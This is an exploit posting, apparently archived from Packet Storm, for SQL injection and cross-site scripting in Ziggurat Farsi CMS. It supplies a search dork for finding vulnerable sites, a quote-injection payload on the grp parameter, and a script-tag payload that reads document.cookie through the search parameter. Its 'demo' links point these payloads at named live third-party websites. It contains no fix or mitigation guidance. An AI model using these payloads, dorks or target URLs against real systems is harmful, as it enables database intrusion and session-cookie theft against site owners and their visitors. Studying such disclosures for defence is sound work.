Ziggurat CMS Cross Site Scripting / SQL Injection

2010-12-21T00:00:00
ID PACKETSTORM:96876
Type packetstorm
Reporter d3c0der
Modified 2010-12-21T00:00:00

Description

                                        
                                            `#########################################################  
Ziggurat CMS Multiple Vulnerabilities   
---------------------------------------------------------  
Portal Name: Ziggurat Farsi CMS  
software : http://www.farsi-cms.com  
Author : d3c0der - d3c0der@hotmail.com  
google dork : Powered By Ziggurat Farsi CMS  
homepage : www.attackerz.ir  
spt : netqurd - maarek - l3l4ck.$c0rpi0n   
---------------------------------------------------------  
  
  
#########################################################  
##sql injection   
[sqli] :  
http://www.[site]/main.asp?id=[id]&grp=[id]' [sqli]   
  
demo :  
http://www.sbco.ir/main.asp?id=22&grp=24'   
  
******** ********* *********  
  
##Cross Site Scripting ( in search )  
[xss] :  
http://www.[site]/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0  
  
demo :  
http://www.sbco.ir/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0  
  
http://zahedan-tebyan.ir/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0&B1=%D8%A8%DA%AF%D8%B1%D8%AF  
  
---------------------------------  
by : d3c0der  
  
#########################################################  
  
  
  
`